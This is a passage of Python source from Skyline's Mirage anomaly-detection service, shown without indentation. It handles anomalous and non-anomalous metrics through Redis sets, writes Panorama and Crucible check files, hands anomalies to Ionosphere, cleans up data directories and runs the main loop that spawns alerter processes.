# Task #3868: POC MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
if high_resolution_analysis:
second_order_resolution_seconds = int(second_order_low_resolution_seconds)
datapoint = low_resolution_timeseries[-1][1]
timeseries = low_resolution_timeseries
logger.info('analysis on high resolution done, reverting to original timeseries and second_order_resolution_seconds')
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
redis_set = 'analyzer.waterfall_alerts.sent_to_mirage'
literal_analyzer_waterfall_alerts = []
try:
literal_analyzer_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_analyzer_waterfall_alerts = []
analyzer_waterfall_alerts = []
for literal_waterfall_alert in literal_analyzer_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
analyzer_waterfall_alerts.append(waterfall_alert)
if not anomalous:
not_anomalous_metric = [datapoint, base_name]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.not_anomalous_metrics.append(not_anomalous_metric)
redis_set = 'mirage.not_anomalous_metrics'
data = str(not_anomalous_metric)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
redis_set = 'analyzer.waterfall_alerts.sent_to_mirage'
for waterfall_alert in analyzer_waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == metric_timestamp:
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_set))
# @added 20201128 - Feature #3734: waterfall alerts
# If the check just done is newer than an existing analyzer
# waterfall alert metric timestamp, remove those entries as well
if int(waterfall_alert[1]) < metric_timestamp:
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item with older timestamp from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_set))
# @added 20210330 - Feature #3994: Panorama - mirage not anomalous
# An entry is added to the mirage.panorama.not_anomalous_metrics Redis
# hash for every metric that is found to be not anomalous. This provides
# data for the /panorama?not_anomalous and /panorama?not_anomalous_metric
# methods which are used for plots in the webapp and json response.
# The mirage.panorama.not_anomalous_metrics Redis hash is managed in
# analyzer/metrics_manager
not_anomalous_timestamp = None
try:
not_anomalous_timestamp = int(timeseries[-1][0])
except:
not_anomalous_timestamp = int(metric_timestamp)
redis_hash = 'mirage.panorama.not_anomalous_metrics'
try:
data = {
base_name: {
'timestamp': not_anomalous_timestamp,
'value': datapoint,
'hours_to_resolve': int(hours_to_resolve),
}
}
self.redis_conn.hset(redis_hash, time(), str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis hash %s' % (
str(data), str(redis_hash)))
logger.info('not anomalous :: %s with %s' % (metric, value))
# If it's anomalous, add it to list
if anomalous:
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
if metric.startswith(settings.FULL_NAMESPACE):
base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric
# metric_timestamp = int(timeseries[-1][0])
metric_timestamp = int_metric_timestamp
# Get the anomaly breakdown - who returned True?
triggered_algorithms = []
for index, value in enumerate(ensemble):
if value:
# @modified 20200607 - Feature #3566: custom_algorithms
# algorithm = settings.MIRAGE_ALGORITHMS[index]
algorithm = algorithms_run[index]
anomaly_breakdown[algorithm] += 1
triggered_algorithms.append(algorithm)
# @modified 20201007 - Feature #3772: Add the anomaly_id to the http_alerter json
# Branch #3068: SNAB
# Added second_order_resolution_seconds, triggered_algorithms and algorithms_run
# anomalous_metric = [datapoint, base_name, metric_timestamp]
anomalous_metric = [datapoint, base_name, metric_timestamp, second_order_resolution_seconds, triggered_algorithms, algorithms_run]
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.anomalous_metrics.append(anomalous_metric)
redis_set = 'mirage.anomalous_metrics'
data = str(anomalous_metric)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to mirage.anomalous_metrics Redis set' % (
str(data)))
# @modified 20201001 - Branch #3068: SNAB
# Task #3748: POC SNAB
# Added analysis_run_time
if snab_check_namespace:
redis_key = 'mirage.analysis_run_time.%s.%s' % (base_name, str(metric_timestamp))
try:
self.redis_conn.setex(redis_key, 120, str(analysis_run_time))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add snab analysis_run_time Redis key - %s' % (
redis_key))
logger.info('anomaly detected :: %s with %s' % (metric, str(datapoint)))
# It runs so fast, this allows us to process 30 anomalies/min
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# Removed limit
# sleep(2)
# @added 20170206 - Bug #1904: Handle non filesystem friendly metric names in check files
sane_metricname = filesafe_metricname(str(base_name))
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrics have negative values so that they can be
# added to the ionosphere.untrainable_metrics Redis set
if run_negatives_present and negatives_found:
redis_set = 'ionosphere.untrainable_metrics'
try:
last_negative_timestamp = int(negatives_found[-1][0])
last_negative_value = negatives_found[-1][1]
remove_after_timestamp = int(last_negative_timestamp + second_order_resolution_seconds)
data = str([base_name, metric_timestamp, datapoint, last_negative_timestamp, last_negative_value, second_order_resolution_seconds, remove_after_timestamp])
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# If Crucible or Panorama are enabled determine details
determine_anomaly_details = False
if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED:
determine_anomaly_details = True
if settings.PANORAMA_ENABLED:
determine_anomaly_details = True
# If Ionosphere is enabled determine details
try:
ionosphere_enabled = settings.IONOSPHERE_ENABLED
if settings.IONOSPHERE_ENABLED:
determine_anomaly_details = True
except:
ionosphere_enabled = False
if determine_anomaly_details:
# metric_timestamp = str(int(timeseries[-1][0]))
from_timestamp = str(int(timeseries[1][0]))
timeseries_dir = base_name.replace('.', '/')
cache_key = 'mirage.last_alert.smtp.%s' % (base_name)
last_alert = False
try:
# @modified 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Changed the last_alert cache key to hold the last
# anomaly timestamp
# last_alert = self.redis_conn.get(cache_key)
last_alert = self.redis_conn_decoded.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % str(e))
# @added 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Evaluate the reported anomaly timestamp to determine whether
# EXPIRATION_TIME should be applied to a batch metric
if last_alert:
# Is this an analyzer_batch related anomaly
analyzer_batch_anomaly = None
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(int_metric_timestamp), base_name)
try:
analyzer_batch_anomaly = self.redis_conn_decoded.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
logger.info('not identified as an analyzer_batch triggered anomaly as no Redis key found - %s' % analyzer_batch_metric_anomaly_key)
if last_alert and analyzer_batch_anomaly:
# @modified 20201107 - Feature #3830: metrics_manager
# Optimise to use metrics_manager HGETALL rather than
# iterating the list of lists
# mirage_metrics_expiration_times = []
# try:
# mirage_metrics_expiration_times = list(self.redis_conn_decoded.smembers('mirage.metrics_expiration_times'))
# if LOCAL_DEBUG:
# logger.info('debug :: fetched the mirage.metrics_expiration_times Redis set')
# except:
# logger.info('failed to fetch the mirage.metrics_expiration_times Redis set')
# mirage_metrics_expiration_times = []
# metric_expiration_time = 3600
# try:
# for item_list_string in mirage_metrics_expiration_times:
# mirage_alert_expiration_data = literal_eval(item_list_string)
# if mirage_alert_expiration_data[0] == base_name:
# metric_expiration_time = int(mirage_alert_expiration_data[1])
# break
# except:
# if LOCAL_DEBUG:
# logger.error('error :: failed to determine mirage_alert_expiration_data for %s from the mirage.metrics_expiration_times Redis set' % str(base_name))
# metric_expiration_time = 3600
mirage_metrics_expiration_times = {}
try:
mirage_metrics_expiration_times = self.redis_conn_decoded.hgetall('mirage.hash_key.metrics_expiration_times')
logger.info('%s entries in mirage.hash_key.metrics_expiration_times Redis hash key' % str(len(mirage_metrics_expiration_times)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get Redis hash key mirage.hash_key.metrics_expiration_times')
mirage_metrics_expiration_times = {}
try:
logger.info('%s entries in mirage.hash_key.metrics_expiration_times Redis hash key' % str(len(mirage_metrics_expiration_times)))
metric_expiration_time = int(mirage_metrics_expiration_times[base_name])
logger.info('%s has expiration time of %s' % (base_name, str(metric_expiration_time)))
except:
if LOCAL_DEBUG:
logger.error('error :: failed to determine mirage_alert_expiration_data for %s from the mirage.hash_key.metrics_expiration_times Redis hash key' % str(base_name))
metric_expiration_time = 3600
last_timestamp = None
try:
last_timestamp = int(last_alert)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine last_timestamp from the last Mirage alert key - %s' % cache_key)
last_timestamp = None
seconds_between_batch_anomalies = None
if last_timestamp:
try:
seconds_between_batch_anomalies = int(int_metric_timestamp) - int(last_timestamp)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine seconds_between_batch_anomalies for batch metric Panorama key- %s' % cache_key)
last_timestamp = None
if seconds_between_batch_anomalies:
if seconds_between_batch_anomalies > int(metric_expiration_time):
logger.info('the difference between the last anomaly timestamp (%s) and the batch anomaly timestamp (%s) for batch metric %s is greater than the metric EXPIRATION_TIME of %s' % (
str(last_timestamp), str(int_metric_timestamp), base_name,
str(metric_expiration_time)))
logger.info('alerting on anomaly for batch metric %s, so setting last_alert to None' % (
metric))
last_alert = None
else:
logger.info('the difference between the last anomaly timestamp (%s) and the batch anomaly timestamp (%s) for batch metric %s is less than the metric EXPIRATION_TIME of %s, not alerting' % (
str(last_timestamp), str(int_metric_timestamp), base_name,
str(metric_expiration_time)))
if int(int_metric_timestamp) < last_timestamp:
logger.info('batch anomaly timestamp (%s) less than the last_check timestamp (%s), alerting on anomaly for batch metric %s, so setting last_alert to None' % (
str(int_metric_timestamp), str(last_timestamp), base_name))
last_alert = None
# @added 20170308 - Feature #1960: ionosphere_layers
# Allow Ionosphere to send Panorama checks, it is an ionosphere_metric
try:
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
ionosphere_unique_metrics = list(self.redis_conn_decoded.smembers('ionosphere.unique_metrics'))
except:
ionosphere_unique_metrics = []
added_at = str(int(time()))
# If Panorama is enabled - create a Panorama check
# @modified 20170308 - Feature #1960: ionosphere_layers
# Allow Ionosphere to send Panorama checks for ionosphere_metrics
# if settings.PANORAMA_ENABLED:
send_to_panorama = False
redis_metric_name = '%s%s' % (str(settings.FULL_NAMESPACE), str(base_name))
if settings.PANORAMA_ENABLED:
send_to_panorama = True
if redis_metric_name in ionosphere_unique_metrics:
send_to_panorama = False
if send_to_panorama:
if not os.path.exists(settings.PANORAMA_CHECK_PATH):
mkdir_p(settings.PANORAMA_CHECK_PATH)
# Note:
# The values are enclosed in single quotes intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
source = 'graphite'
panaroma_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(datapoint), from_timestamp,
# @modified 20200607 - Feature #3566: custom_algorithms
# str(int_metric_timestamp), str(settings.MIRAGE_ALGORITHMS),
str(int_metric_timestamp), str(algorithms_run),
triggered_algorithms, skyline_app, source,
this_host, added_at)
# Create an anomaly file with details about the anomaly
panaroma_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at, sane_metricname)
try:
write_data_to_file(
skyline_app, panaroma_anomaly_file, 'w',
panaroma_anomaly_data)
logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Move to Redis set block below
# self.sent_to_panorama.append(base_name)
except:
logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
logger.error(traceback.format_exc())
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved from the above self.sent_to_panorama
redis_set = 'mirage.sent_to_panorama'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20210323 - Feature #3642: Anomaly type classification
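# Add the anomaly details to the luminosity.classify_anomalies Redis
# set so that Luminosity can classify the anomaly type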
if LUMINOSITY_CLASSIFY_ANOMALIES:
redis_set = 'luminosity.classify_anomalies'
data_dict = {
'metric': metric,
'timestamp': int_metric_timestamp,
'value': datapoint,
'algorithms': algorithms_run,
'triggered_algorithms': triggered_algorithms,
'app': skyline_app,
'added_at': int(added_at),
}
data = [metric, int_metric_timestamp, int(added_at), data_dict]
try:
self.redis_conn.sadd(redis_set, str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
redis_set = 'analyzer.waterfall_alerts.sent_to_mirage'
for waterfall_alert in analyzer_waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == metric_timestamp:
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_set))
# If crucible is enabled - save timeseries and create a
# crucible check
if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED:
from_timestamp = str(int(timeseries[1][0]))
timeseries_dir = base_name.replace('.', '/')
crucible_anomaly_dir = str(settings.CRUCIBLE_DATA_FOLDER) + '/' + timeseries_dir + '/' + metric_timestamp
if not os.path.exists(crucible_anomaly_dir):
mkdir_p(crucible_anomaly_dir)
# Note:
# The value is enclosed in single quotes intentionally
# as the imp.load_source used in crucible results in a
# shift in the decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
crucible_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'anomaly_dir = \'%s\'\n' \
'graphite_metric = True\n' \
'run_crucible_tests = False\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(datapoint), from_timestamp,
# @modified 20200607 - Feature #3566: custom_algorithms
# str(int_metric_timestamp), str(settings.MIRAGE_ALGORITHMS),
str(int_metric_timestamp), str(algorithms_run),
triggered_algorithms, crucible_anomaly_dir,
skyline_app, added_at)
# Create an anomaly file with details about the anomaly
crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, sane_metricname)
try:
write_data_to_file(
skyline_app, crucible_anomaly_file, 'w',
crucible_anomaly_data)
logger.info('added crucible anomaly file :: %s' % (crucible_anomaly_file))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.sent_to_crucible.append(base_name)
except:
logger.error('error :: failed to add crucible anomaly file :: %s' % (crucible_anomaly_file))
logger.error(traceback.format_exc())
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved from the above self.sent_to_crucible
redis_set = 'mirage.sent_to_crucible'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# Create timeseries json file with the timeseries
json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name)
timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
try:
write_data_to_file(skyline_app, json_file, 'w', timeseries_json)
logger.info('added crucible timeseries file :: %s' % (json_file))
except:
logger.error('error :: failed to add crucible timeseries file :: %s' % (json_file))
logger.error(traceback.format_exc())
# Create a crucible check file
crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, sane_metricname)
try:
write_data_to_file(
skyline_app, crucible_check_file, 'w',
crucible_anomaly_data)
logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp))
except:
logger.error('error :: failed to add crucible check file :: %s' % (crucible_check_file))
logger.error(traceback.format_exc())
# @added 20160922 - Branch #922: Ionosphere
# Also added the send_anomalous_metric_to skyline_functions.py
# function
if ionosphere_enabled:
if not last_alert:
# @modified 20161228 Feature #1830: Ionosphere alerts
# Added full_duration which needs to be recorded to allow Mirage metrics
# to be profiled on Redis timeseries data at FULL_DURATION
# e.g. mirage.redis.24h.json
full_duration = str(second_order_resolution_seconds)
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
ionosphere_parent_id = 0
send_anomalous_metric_to(
skyline_app, 'ionosphere', timeseries_dir,
str(int_metric_timestamp), base_name, str(datapoint),
from_timestamp, triggered_algorithms, timeseries,
full_duration, str(ionosphere_parent_id),
# @added 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert
algorithms_run)
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to the mirage.sent_to_ionosphere Redis set
# block below
# self.sent_to_ionosphere.append(base_name)
# @added 20200804 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Add training data to the ionosphere.training_data so that
# the ionosphere purge_old_data_dirs can happen less
# frequently for reduced I/O
redis_set = 'ionosphere.training_data'
data = [base_name, int(int_metric_timestamp), second_order_resolution_seconds]
try:
logger.info('adding to Redis set %s - %s' % (
redis_set, str(data)))
self.redis_conn.sadd(redis_set, str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to %s Redis set' % (str(data), redis_set))
else:
logger.info('alert expiry key exists not sending to Ionosphere :: %s' % base_name)
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
# Do not remove if this is only for training_data creation
if redis_metric_name in ionosphere_unique_metrics:
redis_set = 'analyzer.waterfall_alerts.sent_to_mirage'
mirage_waterfall_data = []
for waterfall_alert in analyzer_waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == metric_timestamp:
mirage_waterfall_data = waterfall_alert
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_set))
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved from the above self.sent_to_ionosphere
if not last_alert:
redis_set = 'mirage.sent_to_ionosphere'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20200904 - Feature #3734: waterfall alerts
# Add mirage waterfall alert
# Only add if this is an ionosphere_enabled metric_check_file
if redis_metric_name in ionosphere_unique_metrics:
if mirage_waterfall_data:
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
waterfall_data = mirage_waterfall_data
# @added 20201008 - Bug #3776: waterfall_alert - no analyzer triggered_algorithms in waterfall_panorama_data on MIRAGE_ALWAYS_METRICS
# When a MIRAGE_ALWAYS_METRICS metric is sent
# through to Mirage from Analyzer it sometimes has
# no triggered_algorithms as the
# metric is sent every run, this can be expected.
# However if the Mirage three-sigma check does
# trigger algorithms they need to be added here so
# that when metric and event are sent to Panorama
# the triggered_algorithms is populated
if base_name in MIRAGE_ALWAYS_METRICS:
from_timestamp = str(int(timeseries[1][0]))
waterfall_panorama_data = [
base_name, datapoint, int(timeseries[1][0]),
int(timeseries[-1][0]), algorithms_run,
triggered_algorithms, skyline_app,
skyline_app, this_host,
waterfall_alert[4][9]
]
# Use the original added_to_waterfall_timestamp
added_to_waterfall_timestamp = waterfall_data[3]
# @modified 20201009 - Bug #3776: waterfall_alert - no analyzer triggered_algorithms in waterfall_panorama_data on MIRAGE_ALWAYS_METRICS
# corrected datapoint, timestamp order
waterfall_data = [
base_name, int(timeseries[-1][0]), datapoint,
added_to_waterfall_timestamp, waterfall_panorama_data
]
redis_set = 'mirage.waterfall_alerts.sent_to_ionosphere'
try:
self.redis_conn.sadd(redis_set, str(waterfall_data))
logger.info('added to Redis set %s - %s' % (redis_set, str(waterfall_data)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(waterfall_data), str(redis_set)))
# Add values to the queue so the parent process can collate
for key, value in anomaly_breakdown.items():
self.mirage_anomaly_breakdown_q.put((key, value))
for key, value in exceptions.items():
self.mirage_exceptions_q.put((key, value))
metric_var_files = []
timeseries = []
if os.path.isfile(metric_check_file):
# Remove metric check file
try:
os.remove(metric_check_file)
logger.info('removed check file - %s' % metric_check_file)
except OSError:
logger.error('error :: failed to remove check file - %s' % metric_check_file)
pass
# Remove the metric directory
if os.path.exists(metric_data_dir):
try:
rmtree(metric_data_dir)
logger.info('removed data dir - %s' % metric_data_dir)
except:
logger.error('error :: failed to rmtree %s' % metric_data_dir)
# @added 20200723 - Feature #3472: ionosphere.training_data Redis set
# Feature #3566: custom_algorithms
# Optimize for MIRAGE_ALWAYS_METRICS which can create a lot
# of training_data dirs as Analyzer always hands them off to
# Mirage.
remove_ionosphere_data_dir = False
if not anomalous:
if base_name in MIRAGE_ALWAYS_METRICS:
remove_ionosphere_data_dir = True
if not anomalous and periodic_mirage_check:
remove_ionosphere_data_dir = True
# @added 20190408 - Feature #2882: Mirage - periodic_check
# Remove the training_dir for mirage_periodic_check_metrics if not
# anomalous
# @modified 20200723 - Feature #3472: ionosphere.training_data Redis set
# Feature #3566: custom_algorithms
# if not anomalous and periodic_mirage_check:
if remove_ionosphere_data_dir:
timeseries_dir = base_name.replace('.', '/')
training_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, str(metric_timestamp),
str(timeseries_dir))
if os.path.exists(training_dir):
try:
rmtree(training_dir)
logger.info('removed Mirage always or periodic check training_data dir - %s' % training_dir)
except:
logger.error('error :: failed to rmtree Mirage always or periodic check training_dir - %s' % training_dir)
if not anomalous and periodic_mirage_check:
del mirage_periodic_check_metrics
def run(self):
"""
Called when the process initializes.
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
os.remove(skyline_app_logwait)
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
def smtp_trigger_alert(alert, metric, second_order_resolution_seconds, context, triggered_algorithms):
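# Spawn a single spawn_alerter_process and allow it up to 15 seconds
# to complete before terminating it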
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
try:
# @modified 20210304 - Feature #3642: Anomaly type classification
# Feature #3970: custom_algorithm - adtk_level_shift
# Added triggered_algorithms
p = Process(target=self.spawn_alerter_process, args=(alert, metric, second_order_resolution_seconds, context, triggered_algorithms))
pids.append(p)
pid_count += 1
p.start()
spawned_pids.append(p.pid)
except:
logger.error('error :: failed to spawn_alerter_process')
logger.error(traceback.format_exc())
p_starts = time()
while time() - p_starts <= 15:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
break
else:
# We only enter this if we didn't 'break' above.
logger.info('%s :: timed out, killing the spawn_trigger_alert process' % (skyline_app))
for p in pids:
p.terminate()
# p.join()
for p in pids:
if p.is_alive():
logger.info('%s :: stopping spawn_alerter_process - %s' % (skyline_app, str(p.is_alive())))
p.join()
"""
DEVELOPMENT ONLY
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
"""
if ENABLE_MEMORY_PROFILING and garbage_collection_enabled:
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
gc.enable()
gc.set_debug(gc.DEBUG_LEAK)
# As per http://stackoverflow.com/a/1641280
# This got useable understandable data with gc
before = defaultdict(int)
after = defaultdict(int)
for i in get_objects():
before[type(i)] += 1
if LOCAL_DEBUG:
logger.info('debug :: Memory usage in run at start: %s (kb)' % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
last_sent_to_graphite = int(time())
while 1:
now = time()
"""
DEVELOPMENT ONLY
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
"""
if ENABLE_MEMORY_PROFILING and garbage_collection_enabled:
# As per http://stackoverflow.com/a/1641280
# This got useable understandable data with gc
before = defaultdict(int)
after = defaultdict(int)
for i in get_objects():
before[type(i)] += 1
if LOCAL_DEBUG:
logger.info('debug :: Memory usage before looking for checks: %s (kb)' % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
# Make sure Redis is up
try:
self.redis_conn.ping()
except:
logger.info('skyline can not connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
logger.info('connecting to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
# @modified 20191113 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
try:
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
except:
logger.info('failed to connect to Redis')
if self.redis_conn.ping():
logger.info('connected to redis')
continue
"""
Determine if any metric to analyze or Ionosphere alerts to be sent
"""
while True:
# Report app up
# @modified 20210524 - Branch #1444: thunder
# Report app AND Redis as up
# self.redis_conn.setex(skyline_app, 120, now)
try:
redis_is_up = self.redis_conn.setex(skyline_app, 120, now)
if redis_is_up:
try:
self.redis_conn.setex('redis', 120, now)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: could not update the Redis redis key - %s' % (
e))
except Exception as e:
logger.error('error :: failed to update Redis key for %s up - %s' % (skyline_app, e))
# @added 20200604 - Mirage - populate_redis
# This functionality enables Mirage to populate the Skyline
# Redis instance with FULL_DURATION data from Graphite if
# Analyzer flags the time series as TooShort and adds it to the
# mirage.populate_redis Redis set. Or possibly if there are
# airgaps in the Redis data due to a network partition. It will
# fill a metric about every 10 seconds or so, unless there are
# Mirage checks or ionosphere_alerts to send
populate_redis_with_metrics = []
if MIRAGE_AUTOFILL_TOOSHORT:
try:
populate_redis_with_metrics = list(self.redis_conn_decoded.smembers('mirage.populate_redis'))
except:
logger.error(traceback.format_exc())
